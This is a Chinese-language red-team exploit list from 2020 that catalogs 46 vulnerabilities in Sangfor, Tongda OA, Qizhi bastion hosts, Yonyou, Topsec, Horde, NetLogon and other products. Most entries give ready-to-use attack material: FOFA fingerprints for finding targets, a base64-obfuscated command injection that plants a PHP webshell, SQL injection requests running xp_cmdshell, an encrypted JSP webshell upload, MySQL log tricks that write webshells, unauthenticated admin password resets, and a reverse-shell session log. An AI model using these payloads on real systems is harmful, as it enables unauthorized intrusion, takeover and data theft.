2020帶行動BUG_List

漏洞列表

• 1 深信服EDR終端響應檢測平台未授權遠程代碼執行
• 2 深信服EDR終端響應檢測平台權限繞過
• 3 通達OA遠程代碼執行
• 4 天融信數據防泄漏系統越權修改管理員密碼
• 5 PHPCMS遠程代碼執行
• 6 Horde Groupware Webmail Edition遠程代碼執行
• 7 齊治堡壘機前台遠程命令執行漏洞（CNVD-2019-20835）
• 8 深信服EDR終端響應檢測平台遠程代碼執行
• 9 綠盟UTS綜合威脅探針管理員任意登錄
• 10 TopApp-LB負載均衡系統SQL注入
• 11 深信服SSL VPN遠程代碼執行
• 12 用友GRP-U8 SQL注入
• 13 泛微雲橋任意文件讀取
• 14 聯軟科技產品存在任意文件上傳和命令執行漏洞
• 15 通達OA v11.7 后台SQL注入導致RCE
• 16 天融信數據防泄漏系統越權修改管理員密碼
• 17 微軟NetLogon 權限提升漏洞CVE-2020-1472
• 18 Pligg遠程命令執行 CVE-2020-25287
• 19 IBM Spectrum Protect Plus目錄遍歷與任意代碼執行漏洞（CVE-2020-4703）
• 20 Apache DolphinScheduler權限覆蓋漏洞[CVE-2020-13922]
• 21 拓爾思TRSWAS5.0文件讀取漏洞通告（CNVD-2020-27769）
• 22 Wordpress File-manager任意文件上傳
• 23 致遠OA任意文件寫入漏洞
• 24 致遠A8文件上傳漏洞
• 25 致遠A8反序列化漏洞
• 26 深信服VPN 任意用戶添加漏洞
• 27 Thinkadmin v6 任意文件讀取漏洞（CVE-2020-25540）
• 28 Apache ActiveMQ 遠程代碼執行漏洞CVE-2020-13920
• 29 Nginx使用LemonLDAP::NG權限繞過漏洞CVE-2020-24660
• 30 MobileIron MDM 遠程代碼執行漏洞CVE-2020-15505
• 31 HordeGroupwareWebmailEdition 遠程命令執行
• 32 Microsoft Exchange遠程代碼執行漏洞
• 33 Spectrum Protect Plus任意代碼執行漏洞（CVE-2020-4711）
• 34 深信服 SSL VPN Nday - Pre Auth 任意密碼重置漏洞
• 35 深信服 SSL VPN 修改綁定手機號碼漏洞
• 36 McAfee Web Gateway多個高危漏洞
• 37 Yii2框架反序列化遠程命令執行漏洞（CVE-2020-15148）（補丁繞過）
• 38 微軟 SQL Server 報表服務遠程代碼執行漏洞（CVE-2020-0618）
• 39 Spring框架RFD（反射型文件下載）漏洞
• 40 VMware Fusion 權限提升漏洞（CVE-2020-3980）
• 41 Aruba Clearpass 遠程命令執行漏洞（CVE-2020-7115）
• 42 Apache Superset遠程代碼執行漏洞（CVE-2020-13948）
• 43 Fastadmin文件上傳漏洞
• 44 WebSphere Application Server XXE 漏洞
• 45 建文工程項目管理軟件任意文件上傳漏洞
• 46 Linux內核AF_PACKET內存破壞導致權限提升漏洞

 

漏洞名稱	對應廠商	影響版本
齊治運維堡壘機服務端存在命令執行漏洞	齊治	CNVD-2019-20835
綠盟UTS綜合威脅探針管理員任意登錄	綠盟	UTS版本<V2.0R00F02SP03
用友GRP-U8 SQL注入	用友	用友GRP
深信服EDR終端響應檢測平台未授權遠程代碼執行	深信服	EDR<3.2.21
深信服EDR終端響應檢測平台權限繞過	深信服	EDR<3.2.21
深信服EDR終端響應檢測平台遠程代碼執行	深信服	EDR<=3.2.21
深信服SSL VPN遠程代碼執行	深信服	深信服VPN（某歷史版本）
泛微雲橋任意文件讀取	泛微	泛微雲橋2018-2019全版本
天融信數據防泄漏系統越權修改管理員密碼	天融信	v3.1130.308p3_DLP.1
TopApp-LB負載均衡系統SQL注入	天融信	TopApp-LB負載均衡 V1.2.8.0#xxx【2014年】
通達OA遠程代碼執行	通達OA	11.6版本受影響，11.3&2017版本不受影響
PHPCMS遠程代碼執行	PHPCMS	全版本
Horde Groupware Webmail Edition遠程代碼執行	Horde	Groupware Webmail Edition
聯軟科技產品存在任意文件上傳和命令執行漏洞	聯軟科技
通達OA v11.7 后台SQL注入導致RCE	通達OA	v11.7
天融信數據防泄漏系統越權修改管理員密碼	天融信
微軟NetLogon 權限提升漏洞CVE-2020-1472	windows	見詳情
Pligg遠程命令執行 CVE-2020-25287	Pligg
IBM Spectrum Protect Plus目錄遍歷與任意代碼執行漏洞（CVE-2020-4703）	IBM
Apache DolphinScheduler權限覆蓋漏洞[CVE-2020-13922]	apache	DolphinScheduler 1.2.0 1.2.1 1.3.1
拓爾思TRSWAS5.0文件讀取漏洞通告（CNVD-2020-27769）	拓爾思
Wordpress File-manager任意文件上傳	Wordpress	file manager 6.0至6.8
致遠OA任意文件寫入漏洞	致遠
致遠A8文件上傳漏洞	致遠
致遠A8反序列化漏洞	致遠
深信服VPN 任意用戶添加漏洞	深信服
Thinkadmin v6 任意文件讀取漏洞（CVE-2020-25540）	Thinkadmin	Thinkadmin ≤ 2020.08.03.01
Apache ActiveMQ 遠程代碼執行漏洞CVE-2020-13920	apache
Nginx使用LemonLDAP::NG權限繞過漏洞CVE-2020-24660	LemonLDAP::NG	lemonldap-ng-handler (npm) < 0.5.1
MobileIron MDM 遠程代碼執行漏洞CVE-2020-15505	MobileIron	MobileIron Core ≤ 10.6 Connector ≤ 10.6 Sentry ≤ 9.8
HordeGroupwareWebmailEdition 遠程命令執行	Horde
Microsoft Exchange遠程代碼執行漏洞	Microsoft
Spectrum Protect Plus任意代碼執行漏洞（CVE-2020-4711）
深信服 SSL VPN Nday - Pre Auth 任意密碼重置漏洞	深信服
深信服 SSL VPN 修改綁定手機號碼漏洞	深信服
McAfee Web Gateway多個高危漏洞	McAfee	McAfee Web Gateway < 9.2.3
Yii2框架反序列化遠程命令執行漏洞（CVE-2020-15148）（補丁繞過）	Yii	Yii2<2.038
微軟 SQL Server 報表服務遠程代碼執行漏洞（CVE-2020-0618）	Microsoft
Spring框架RFD（反射型文件下載）漏洞	Spring
VMware Fusion 權限提升漏洞（CVE-2020-3980）	VMware	VMware Fusion 11.x
Aruba Clearpass 遠程命令執行漏洞（CVE-2020-7115）
Apache Superset遠程代碼執行漏洞（CVE-2020-13948）	Apache
Fastadmin文件上傳漏洞	Fastadmin
WebSphere Application Server XXE 漏洞	WebSphere
建文工程項目管理軟件任意文件上傳漏洞
Linux內核AF_PACKET內存破壞導致權限提升漏洞	Linux內核

利用&復現

深信服EDR終端響應檢測平台未授權遠程代碼執行

漏洞參數 host，直接進行命令執行

Fofa:語法 title="終端檢測響應平台"

payload: https://your-ip:port/tool/log/c.php?strip_slashes=system&host=id
鏈接：https://pan.baidu.com/s/1lhT99Pytjn9p1dts3ZsBcQ 提取碼：jrah

深信服EDR終端響應檢測平台權限繞過

fofa指紋: title="SANGFOR終端檢測響應平台"<br /

payload: https://ip/ui/login.php?user=隨意

寶塔面板未授權訪問漏洞

影響版本：
寶塔面板Linux 7.4.2 版本，Windows 6.8版本，Linux測試版本 7.5.14版本
訪問：ip:888/pma
鏈接：https://pan.baidu.com/s/1lhT99Pytjn9p1dts3ZsBcQ 提取碼：jrah

通達OA遠程代碼執行

在真實環境中復現會刪掉auth.inc.php文件，對系統造成影響

鏈接：https://pan.baidu.com/s/1lhT99Pytjn9p1dts3ZsBcQ 提取碼：jrah

天融信數據防泄漏系統越權修改管理員密碼

漏洞影響:已知版本號v3.1130.308p3_DLP.1
風險等級:高
漏洞細節:管理員登陸系統之后修改密碼,未采用原由碼校驗,且存在未授權訪問導致存在了越權修改管理員密碼.
默認用戶superman的uid=1
POST /?module-auth_user&action=mod_edit.pwd HTTP/1.1

齊治堡壘機前台遠程命令執行漏洞

漏洞利用：
利用條件：無需登錄：
第一
http://10.20.10.11/listener/cluster_manage.php 返回"OK"。
第二，執行以下鏈接即可 getshell，執行成功后，生成 PHP 一句話馬
/var/www/shterm/resources/qrcode/lbj77.php 密碼 10086，使用 BASE64 進行編碼。這里假設 10.20.10.10 為堡壘機的 IP 地址。

   

https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}"ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}-d|bash`|${IFS}|echo${IFS}

特征：

   

漏洞利用點：

https://10.20.10.10/ha_request.php

Poc 形式：

${IFS}|`echo${IFS}"ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}-d|bash`|${IFS}|echo${IFS}

齊治堡壘機遠程代碼執行(java版本)

   

POST /shterm/listener/tui_update.php

a=["t';import os;os.popen('whoami')#"]

泛微OA雲橋任意文件讀取漏洞

利用/wxjsapi/saveYZJFile接口獲取filepath,返回數據包內出現了程序的絕對路徑,攻擊者可以通過返回內容識別程序運行路徑從而下載數據庫配置文件危害可見。

多款Huawei產品越界讀取漏洞（CNVD-2020-36735）

參考鏈接：https://www.cnvd.org.cn/flaw/show/CNVD-2020-36735

Exchange Server 遠程代碼執行漏洞（POC未驗證）

CVE-2020-16875: Exchange Server 遠程代碼執行漏洞（202009月度漏洞）
ps 版POC：https://srcincite.io/pocs/cve-2020-16875.ps1.txt
py 版POC：https://srcincite.io/pocs/cve-2020-16875.py.txt

天融信TopApp-LB 負載均衡系統sql注入

   

POST /acc/clsf/report/datasource.php HTTP/1.1

Host:

Connection: close

Accept: text/javascript, text/html, application/xml, text/xml, */*

X-Prototype-Version: 1.6.0.3

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: cors

Sec-Fetch-Dest: empty

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: PHPSESSID=ijqtopbcbmu8d70o5t3kmvgt57

Content-Type: application/x-www-form-urlencoded

Content-Length: 201

t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22--+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=@。。

用友GRP-u8 注入

   

POST /Proxy HTTP/1.1

Accept: Accept: /

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)

Host: host

Content-Length: 357

Connection: Keep-Alive

Cache-Control: no-cache

cVer=9.8.0&dp=XMLAS_DataRequestProviderNameDataSetProviderDataDataexec xp_cmdshell 'net user'

綠盟UTS綜合威脅探針管理員任意登錄

漏洞詳情：
綠盟全流量威脅分析解決方案針對原始流量進行采集和監控，對流量信息進行深度還原、存儲、查詢和分析，可以及時掌握重要信息系統相關網絡安全威脅風險，及時檢測漏洞、病毒木馬、網絡攻擊情況，及時發現網絡安全事件線索，及時通報預警重大網絡安全威脅，調查、防范和打擊網絡攻擊等惡意行為，保障重要信息系統的網絡安全。

綠盟綜合威脅探針設備版本V2.0R00F02SP02及之前存在此漏洞。

處置意見:
建議盡快更新補丁至最新： http://update.nsfocus.com/update/listBsaUtsDetail/v/F02

漏洞利用過程：


對響應包進行修改，將false更改為true的時候可以泄露管理用戶的md5值密碼



利用渠道的md5值去登錄頁面

7ac301836522b54afcbbed714534c7fb
成功登錄，登錄后通過管理員權限對設備進行管控，並且可以看到大量的攻擊信息，泄露內部網絡地址包括資產管理。

聯軟科技產品存在任意文件上傳和命令執行漏洞

漏洞詳情：
任意文件上傳漏洞，存在於用戶自檢報告上傳時，后台使用黑名單機制對上傳的文件進行過濾和限制，由於當前黑名單機制存在缺陷，文件過濾機制可以被繞過，導致存在文件上傳漏洞；利用該漏洞可以獲取webshell權限。（猜測利用黑名單的其他后綴名繞過）
命令執行漏洞，存在於后台資源讀取過程中，對於自動提交的用戶可控參數沒有進行安全檢查，可以通過構造特殊參數的數據包，后台在執行過程中直接執行了提交數據包中的命令參數，導致命令執行漏洞；該漏洞能夠以當前運行的中間件用戶權限執行系統命令，根據中間件用戶權限不同，可以進行添加系統賬戶，使用反彈shell等操作。

   

POST /uai/download/uploadfileToPath.htm HTTP/1.1

HOST: xxxxx

-----------------------------570xxxxxxxxx6025274xxxxxxxx1

Content-Disposition: form-data; name="input_localfile"; filename="xxx.jsp"

Content-Type: image/png

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*該密鑰為連接密碼32位md5值的前16位，默認連接密碼rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

-----------------------------570xxxxxxxxx6025274xxxxxxxx1

Content-Disposition: form-data; name="uploadpath"

../webapps/notifymsg/devreport/

-----------------------------570xxxxxxxxx6025274xxxxxxxx1--

通達OA v11.7 后台SQL注入導致RCE

測試版本：通達OA v11.7 版本
限制條件：需要賬號登錄
添加用戶：

   

general/hr/manage/query/delete_cascade.php?condition_cascade=grant%20all%20privileges%20ON%20mysql.*%20TO%20%27at666%27@%27%%27%20IDENTIFIED%20BY%20%27abcABC@123%27%20WITH%20GRANT%20OPTION

寫shell

   

# 查路徑：

select @@basedir; # c:\td0a117\mysql5\，那么web目錄就是c:\td0a117\webroot\

# 方法1：

set global slow_query_log=on;

set global slow_query_log_file='C:/td0a117/webroot/tony.php';

select '<?php eval($_POST[x]);?>' or sleep(11);

# 方法2：

set global general_log = on;

set global general_log_file = 'C:/td0a117/webroot/tony2.php';

select '<?php eval($_POST[x]);?>';

show variables like '%general%';

天融信數據防泄漏系統越權修改管理員密碼

無需登錄權限,由於修改密碼處未校驗原密碼,且/?module=auth_user&amp;action=mod_edit_pwd
接口未授權訪問,造成直接修改任意用戶密碼。:默認superman賬戶uid為1。

   

POST /?module=auth_user&amp;action=mod_edit_pwd Cookie: username=superman;

uid=1&amp;pd=Newpasswd&amp;mod_pwd=1&amp;dlp_perm=1

微軟NetLogon 權限提升漏洞CVE-2020-1472

攻擊者通過NetLogon（MS-NRPC），建立與域控間易受攻擊的安全通道時，可利用此漏洞獲取域管訪問權限。成功利用此漏洞的攻擊者可以在該網絡中的設備上運行經特殊設計的應用程序。
影響版本
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)
POC
https://github.com/SecuraBV/CVE-2020-1472

完整利用腳本
https://github.com/dirkjanm/CVE-2020-1472
使用：

   

pip install -r requirements.txt

Python zerologon_tester.py EXAMPLE-DC 1.2.3.4

Apache DolphinScheduler權限覆蓋漏洞[CVE-2020-13922]

,默認密碼:admin/dolphinscheduler

   

POST /dolphinscheduler/users/update

id=1&userName=admin&userPassword=Password1!&tenantId=1&email=sdluser%40sdluser.sdluser&phone=

Pligg遠程命令執行 CVE-2020-25287

描述：the_file
由於無需檢查擴展名，我們可以通過模板編輯器菜單使用參數訪問任何文件，然后將webshell創建到現有的php文件中
轉到/admin/admin_editor.php
攔截請求並將路徑更改為文件。

   

POST /admin/admin_editor.php HTTP/1.1

Host: kliqqi

Content-Length: 33

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: http://kliqqi

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://kliqqi/admin/admin_editor.php

Accept-Encoding: gzip, deflate

Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7

Cookie: panelState=CollapseManage%7CCollapseSettings%7CCollapseTemplate; PHPSESSID=lfkc3gtrv5o1golmt5md3; mnm_user=Admin; mnm_key=QWRtaW46MjI0R2dEVTAxZncxZzpl

Connection: close

the_file=..%2Findex.php&open=Open

只需單擊"在瀏覽器中顯示響應"，然后編輯文件即可滿足您的需求
POC:
https://github.com/jenaye/pligg

Horde Groupware WebmailEdition 遠程命令執行

漏洞簡介：
Horde Groupware Webmail是美國Horde公司的一套基於瀏覽器的企業級通信套件。Horde Groupware Webmail中存在代碼注入漏洞。該漏洞源於外部輸入數據構造代碼段的過程中，網絡系統或產品未正確過濾其中的特殊元素。攻擊者可利用該漏洞生成非法的代碼段，修改網絡系統或組件的預期的執行控制流。
利用：

   

./poc.py 172.16.175.148/horde/ hordeuser:pass123 172.16.175.145

(+) targeting http://172.16.175.145/horde/

(+) obtained session iefankvohbl8og0mtaadm3efb6

(+) inserted our php object

(+) triggering deserialization...

(+) starting handler on port 1337

(+) connection from 172.16.175.145

(+) pop thy shell!

id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

pwd

/var/www/horde/services

POC
鏈接：https://pan.baidu.com/s/13BFVrNE8lcWgpH8npUNNDA 提取碼：o0tt

微軟 SQL Server 報表服務遠程代碼執行漏洞（CVE-2020-0618）

影響版本：

更新編號	標題	產品版本
4532097	SQL   Server 2016 Service Pack 2 (GDR) 安全更新：2020 年 2 月 11 日	13.0.5026.0   - 13.0.5101.9
4535706	SQL   Server 2016 Service Pack 2 CU11 安全更新：2020 年 2 月 11 日	13.0.5149.0   - 13.0.5598.27
4532095	SQL   Server 2014 Service Pack 3 (GDR) 安全更新：2020 年 2 月 11 日	12.0.6024.0   - 12.0.6108.1
4535288	SQL   Server 2014 Service Pack 2 CU4 安全更新：2020 年 2 月 11 日	12.0.6205.1   - 12.0.6329.1
4532098	SQL   Server 2012 Service Pack 4 (QFE) 安全更新：2020 年 2 月 11 日	111.0.7001.0   - 11.0.7462.6

修復建議：
廠商已發布了漏洞修復程序，請及時關注更新：
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0618

Spring框架RFD（反射型文件下載）漏洞

近日，補天漏洞響應平台監測到spring官方發布了spring framework的更新，此次更新修復了一個RFD安全漏洞，漏洞編號為CVE-2020-5421。該漏洞可以通過一個jsessionId路徑參數繞過 RFD 保護。

影響版本：

Spring Framework 5.2.0 - 5.2.8

Spring Framework 5.1.0 - 5.1.17

Spring Framework 5.0.0 - 5.0.18

Spring Framework 4.3.0 - 4.3.28

Spring Framework不再支持的老版本

修復建議：
廠商已發布了漏洞修復程序，請及時關注更新：
https://github.com/spring-projects/spring-framework

Aruba Clearpass 遠程命令執行漏洞（CVE-2020-7115）

Aruba Networks ClearPass是美國安移通網絡（Aruba Networks）公司的一套集成了網絡控制功能、應用和設備管理功能的接入管理系統。Policy Manager是其中的一個策略管理器。Aruba Networks ClearPass Policy Manager中的Web接口存在安全漏洞。攻擊者可利用該漏洞繞過身份驗證並執行命令，漏洞利用EXP已被公開，建議受影響的用戶升級至最新版本。

 

影響版本：

ClearPass 6.9.x prior to 6.9.1

ClearPass 6.8.x prior to 6.8.5-HF

ClearPass 6.7.x prior to 6.7.13-HF

 

廠商已發布了漏洞修復程序，請及時關注更新：

https://www.vmware.com/security/advisories/VMSA-2020-0020.html